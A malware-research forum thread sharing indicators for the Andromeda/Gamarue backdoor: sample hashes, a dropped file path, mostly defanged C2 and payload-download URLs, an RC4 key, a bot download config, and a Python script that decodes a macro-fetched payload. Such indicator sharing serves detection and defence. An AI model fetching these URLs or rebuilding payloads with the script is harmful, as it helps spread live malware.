Backdoor Andromeda (waahoo, alias Gamarue)

Forum for analysis and discussion about malware.
sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am
Contact:

Re: Malware collection

Post by sysopfb » Sun Aug 16, 2015 4:37 pm

That's Andromeda

Code: Select all

http://and4.junglebeariwtc1.com/bla08/adm.php

sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am
Contact:

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by sysopfb » Tue Oct 27, 2015 8:07 pm

Word doc macro downloads:
hxxp://91.229.79.231:8080/cfab2e3d.jpg


Can be decoded using the following script:

Code: Select all

array = [x for x in xrange(0,256)]
arg1 = open('cfab2e3d.jpg','rb').read()
arg2 = "abc123"
arg1 = bytearray(arg1)
arg2 = bytearray(arg2)

arg1_len = len(arg1)
arg2_len = len(arg2)


for i in xrange(256,286):
	array.append(i ^ 256)
for i in xrange(1,6):
	array[i+249] = arg2[arg2_len-i-1]
	array[i-1] = arg2[i-1] ^ (255 - arg2[arg2_len-i-1])

meh = 0
ces = 0
peej = False
for i in xrange(0,len(arg1)):
	if meh > len(arg2)-1:
		meh = 0
	if ces > 285 and peej == False:
		ces = 0
		peej = not peej
	if ces > 285 and peej == True:
		ces = 5
		peej = not peej
	arg1[i] = arg1[i] ^ (array[ces] ^ arg2[meh])
	meh += 1
	ces += 1

open('out.bin','wb').write(arg1)
Produces Andromeda:
0/43
https://www.virustotal.com/en/file/ad57 ... /analysis/

RC4 key: 19fc8d0b7d4edbb2123ecf6adb73df3a

Same bot that was going to popping domains previously
C2:
hxxp://lipetskrulit.com/and/gate.php
hxxp://123ga6sd7d1123.com/and/gate.php

[5,{"klt":0},[1,1,"http:\/\/lipetskrulit.com\/886.exe"],[4,1,"http:\/\/91.229.79.231:8080\/PWSBin.exe"],[6,1,"http:\/\/91.229.79.231:8080\/drose.exe"]]
You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Dec 26, 2015 9:24 am

You do not have the required permissions to view the files attached to this post.

blub.txt
Posts: 3
Joined: Mon Sep 12, 2011 9:56 pm
Contact:

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by blub.txt » Sat Jan 16, 2016 11:36 am

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Feb 24, 2016 3:11 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Apr 10, 2016 7:45 am

You do not have the required permissions to view the files attached to this post.

benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Malware collection

Post by benkow_ » Sun Apr 10, 2016 9:37 am

Gamarue / Andromeda

geoffreyvdb
Posts: 16
Joined: Mon Feb 22, 2016 1:00 pm

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by geoffreyvdb » Mon May 02, 2016 10:56 am

Andromeda/Gamarue, 1/57
40cb267f944376dc378825cb23884e6f

drops msvmj.exe to C:\ProgramData
40cb267f944376dc378825cb23884e6f

CNC:
htxp://and28.aviationdreamflightering1.com/bla28/gate1.php
htxp://and28.aviationdreamflightering2.com/bla28/gate2.php
htxp://and28.aviationdreamflightering3.com/bla28/gate3.php

https://www.virustotal.com/en/file/cb8d ... /analysis/

geoffreyvdb
Posts: 16
Joined: Mon Feb 22, 2016 1:00 pm

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by geoffreyvdb » Mon May 02, 2016 5:30 pm

forgot sample
You do not have the required permissions to view the files attached to this post.

User avatar
xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Mon Jun 20, 2016 10:58 am

Found from a dropper

I think that it is Andromeda. Can anyone confirm ?
You do not have the required permissions to view the files attached to this post.
Last edited by EP_X0FF on Mon Jun 20, 2016 6:58 pm, edited 1 time in total.
Reason: added password for archive
@xorsthingsv2

Post Reply